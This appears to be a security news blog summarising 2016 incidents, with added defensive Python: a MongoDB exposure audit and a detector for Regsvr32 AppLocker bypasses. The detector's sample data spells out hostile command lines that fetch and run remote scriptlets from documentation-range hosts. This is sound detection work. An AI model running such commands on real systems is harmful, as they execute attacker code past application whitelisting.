Security Alerts & News
by Tymoteusz A. Góral

#646 MongoDB configuration error exposed 93 million Mexican voter records
A 132 GB database, containing the personal information on 93.4 million Mexican voters has finally been taken offline. The database sat exposed to the public for at least eight days after its discovery by researcher Chris Vickery, but originally went public in September 2015.

Vickery, who works as a security researcher at Kromtech (the company behind MacKeeper), discovered the MongoDB instance on April 14, but had difficulty tracking down the person or company responsible for placing the voter data on Amazon's AWS. He first reached out to the U.S. State Department, as well as the Mexican Embassy, but had little success.
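The article does not say which settings the voter database had wrong, only that a configuration error left it readable from the Internet. The audit below is an added example, not code from the article or from Kromtech; it assumes the usual combination behind such exposures, a network binding on every interface plus no access control, which is what a mongod before 3.6 did when started with no configuration file at all. The two configurations it checks are constructed for the example.

```python
"""Audit a mongod.conf for the pair of settings that leave a database world-readable.

Added example, not code from the article, which does not say which settings the
Mexican voter database had wrong. It assumes the usual combination behind such
exposures: a network binding on every interface plus no access control, which is
exactly what a mongod before 3.6 did when started with no configuration at all.
"""
from typing import Dict, List, Tuple

ALL_INTERFACES = {'0.0.0.0', '::', '*'}
LOOPBACK = {'127.0.0.1', '::1', 'localhost'}

Finding = Tuple[str, str]  # (severity, message)


def parse_mongod_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the two-level 'section:' / '  key: value' YAML subset mongod.conf uses.

    Deliberately minimal so the example has no dependencies: no lists, anchors or
    maps nested deeper than two levels. Use PyYAML for a real deployment audit.
    """
    conf: Dict[str, Dict[str, str]] = {}
    section = None
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].rstrip()          # drop trailing comments
        if not line.strip():
            continue
        indent = len(line) - len(line.lstrip())
        key, _, value = line.strip().partition(':')
        value = value.strip().strip('"\'')
        if indent == 0:
            section = key
            conf.setdefault(section, {})
        elif section is not None:
            conf[section][key] = value
    return conf


def audit(conf: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Return findings for the exposure pattern: reachable from anywhere, no auth."""
    findings: List[Finding] = []
    net = conf.get('net', {})
    security = conf.get('security', {})

    addrs = {a.strip() for a in net.get('bindIp', '').split(',') if a.strip()}
    if net.get('bindIpAll', 'false').lower() == 'true' or addrs & ALL_INTERFACES:
        findings.append(('high', 'net.bindIp: mongod listens on every interface'))
    elif not addrs:
        findings.append(('high', 'net.bindIp not set: mongod before 3.6 then binds every interface'))
    elif addrs - LOOPBACK:
        findings.append(('info', f'net.bindIp: reachable on {sorted(addrs - LOOPBACK)}; '
                                 'confirm a firewall or security group limits who can connect'))

    if security.get('authorization', 'disabled').lower() != 'enabled':
        findings.append(('high', 'security.authorization not enabled: anyone who reaches '
                                 'the port can read every database'))
    return findings


# Constructed configs for the example, not the one from the incident.
EXPOSED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 0.0.0.0        # reachable from any address
"""

HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongo
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5   # loopback plus the private app-tier address
security:
  authorization: enabled       # require users and roles
"""

if __name__ == '__main__':
    for name, text in (('exposed', EXPOSED_CONF), ('hardened', HARDENED_CONF)):
        print(name)
        for severity, msg in audit(parse_mongod_conf(text)) or [('ok', 'no findings')]:
            print(f'  [{severity}] {msg}')
```

The hardened configuration still produces an informational finding because 10.0.0.5 is not loopback: binding to a private address is only safe if the security group or firewall in front of the instance actually restricts port 27017, which is exactly the control that was missing here.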
#645 MIT launches experimental bug bounty program
The effectiveness of bug bounty programs is difficult to deny, especially after the adoption of one at Uber, which announced last month it would begin paying $10,000 for critical bugs, and at the Department of Defense, whose Hack the Pentagon program illustrates the government’s softening stance on hackers.

The Massachusetts Institute of Technology announced this week that it will follow in those footsteps and launch its own experimental bug bounty program, becoming one of the first academic institutions to reward hackers who find and responsibly disclose vulnerabilities on the school’s sites.
#644 “Nuclear” exploit kit service cashes in on demand from cryptoransomware rings
Security researchers at Cisco Talos and Check Point have published reports detailing the inner workings of Nuclear, an "exploit kit" Web service that deployed malware onto victims' computers through malicious websites. While a significant percentage of Nuclear's infrastructure has been recently disrupted, the exploit kit is still operating—and looks to be a major contributor to the current crypto-ransomware epidemic.

Introduced in 2010, Nuclear has been used to target millions of victims worldwide, giving attackers the ability to tailor their attacks to specific locations and computer configurations. Though not as widely used as the well-known Angler exploit kit, it has been responsible for dropping Locky and other crypto-ransomware onto more than 140,000 computers in more than 200 countries, according to statistics collected by Check Point. The Locky campaign appeared to be placing the greatest demand on the Nuclear pay-to-exploit service.
#643 $10 router blamed in Bangladesh bank hack
Hackers managed to steal $80m (£56m) from Bangladesh's central bank because it skimped on network hardware and security software, reports Reuters.

The bank had no firewall and used second-hand routers that cost $10 to connect to global financial networks.

Better security and hardware would have hampered the attackers, Reuters said, quoting an official investigator.

The hackers aimed to steal $1bn but made mistakes that led to the theft being spotted and stopped.
#642 PowerShell used for spreading Trojan.Laziok through Google Docs
Through our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.
#641 Avast SandBox escape via IOCTL requests
A design flaw in Avast Sandbox allows a potentially harmful program to escape the sandbox and infect the host, by dropping its files outside the sandbox and/or by modifying existing legitimate files of any type.

Affected Products:

Avast Internet Security v11.x.x
Avast Pro Antivirus v11.x.x
Avast Premier v11.x.x
Avast Free Antivirus v11.x.x

Avast Business Security v11.x.x

Avast Endpoint Protection v8.x.x
Avast Endpoint Protection Plus v8.x.x
Avast Endpoint Protection Suite v8.x.x
Avast Endpoint Protection Suite Plus v8.x.x
Avast File Server Security v8.x.x
Avast Email Server Security v8.x.x
#640 How I hacked Facebook, and found someone's backdoor script
As a pentester, I love server-side vulnerabilities more than client-side ones. Why? Because it’s way cooler to take over the server directly and gain system SHELL privileges.

Of course, both server-side and client-side vulnerabilities are indispensable in a perfect penetration test. Sometimes, in order to take over the server more elegantly, you also need some client-side vulnerabilities to do the trick. But speaking of finding vulnerabilities, I prefer to find server-side vulnerabilities first.

With the growing popularity of Facebook around the world, I’ve always been interested in testing the security of Facebook. Luckily, in 2012, Facebook launched the Bug Bounty Program, which even motivated me to give it a shot.
#639 Core Windows utility can be used to bypass AppLocker
A core Windows command-line utility, Regsvr32, used to register DLLs in the Windows Registry, can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft’s AppLocker.

A researcher who requested anonymity found and privately disclosed the issue to Microsoft on Tuesday. It’s unknown whether Microsoft will patch this issue with a security bulletin, or in a future release.

Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary present by default on Windows. The researcher’s proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. Abusing this presumes an attacker is already present on the box, the researcher said.
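Because the script location arrives on the command line, the detection side has something concrete to match on. The check below is an added example, not code from the article or from the researcher's proof of concept: it classifies constructed process-creation records (image path, command line, parent image, the fields Sysmon Event ID 1 or Windows Security 4688 with command-line auditing provide) and flags a Regsvr32 launch whose /i: argument is a URL. It also treats scrobj.dll on the command line as a secondary indicator; that DLL is the script component host the public technique hands to Regsvr32, which this article does not mention, so that part is an assumption beyond the text.

```python
"""Flag Regsvr32 launches that fetch a scriptlet from a remote URL.

Added example, not code from the article or the researcher's proof of concept.
Input is constructed process-creation telemetry (image path, command line,
parent image), the fields Sysmon Event ID 1 or Windows Security 4688 with
command-line auditing provide.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# /i:<value> (or -i:<value>) whose value is a URL: the article's point is that
# the script location arrives on the command line, so that is the indicator.
REMOTE_INSTALL_URL = re.compile(r'[/-]i\s*:\s*"?\s*(?:https?|ftp)://', re.IGNORECASE)
# Any /i: switch, whether the value is a URL or a local path.
INSTALL_SWITCH = re.compile(r'[/-]i\s*:', re.IGNORECASE)


@dataclass(frozen=True)
class ProcEvent:
    image: str      # full path of the created process
    cmdline: str
    parent: str     # parent image name


def is_regsvr32(image: str) -> bool:
    """Match on the file name only: System32, SysWOW64 or a copied binary all count."""
    return image.replace('/', '\\').rsplit('\\', 1)[-1].lower() == 'regsvr32.exe'


def classify(ev: ProcEvent) -> Optional[str]:
    """Return an alert label for a suspicious Regsvr32 launch, or None."""
    if not is_regsvr32(ev.image):
        # The regsvr32 child is its own creation event; matching the parent's
        # command line here would alert twice on the same launch.
        return None
    if REMOTE_INSTALL_URL.search(ev.cmdline):
        return 'high: regsvr32 /i: points at a remote URL'
    # scrobj.dll is the Windows Script Component host the public technique hands
    # to regsvr32. The article does not name it, so it is only a secondary indicator.
    if INSTALL_SWITCH.search(ev.cmdline) and 'scrobj.dll' in ev.cmdline.lower():
        return 'medium: regsvr32 /i: with scrobj.dll (local scriptlet)'
    return None


def hunt(events: List[ProcEvent]) -> List[Tuple[str, str]]:
    """(parent, label) for every event that classify() flags."""
    hits = []
    for ev in events:
        label = classify(ev)
        if label:
            hits.append((ev.parent, label))
    return hits


# Constructed sample telemetry; 192.0.2.10 and example.invalid are documentation addresses.
SAMPLE_EVENTS = [
    ProcEvent(r'C:\Windows\System32\regsvr32.exe',
              r'regsvr32.exe /s C:\Windows\System32\msxml3.dll', 'msiexec.exe'),
    ProcEvent(r'C:\Windows\System32\regsvr32.exe',
              r'regsvr32.exe /s /n /u /i:http://192.0.2.10/payload.sct scrobj.dll', 'cmd.exe'),
    ProcEvent(r'C:\Windows\SysWOW64\regsvr32.exe',
              'regsvr32 -s -n -u -i:"https://example.invalid/x.sct" scrobj.dll', 'winword.exe'),
    ProcEvent(r'C:\Windows\System32\regsvr32.exe',
              r'regsvr32.exe /s /n /u /i:C:\Users\Public\stage.sct scrobj.dll', 'powershell.exe'),
    ProcEvent(r'C:\Windows\System32\cmd.exe',
              'cmd.exe /c regsvr32 /i:http://192.0.2.10/a.sct scrobj.dll', 'explorer.exe'),
]

if __name__ == '__main__':
    for parent, label in hunt(SAMPLE_EVENTS):
        print(f'{label}  (parent: {parent})')
```

The legitimate registration from msiexec.exe is left alone, the two URL cases are flagged regardless of switch prefix or quoting, and the local .sct case surfaces at lower severity. The parent image is carried through because an Office or browser parent spawning Regsvr32 is the context an analyst wants next to the alert.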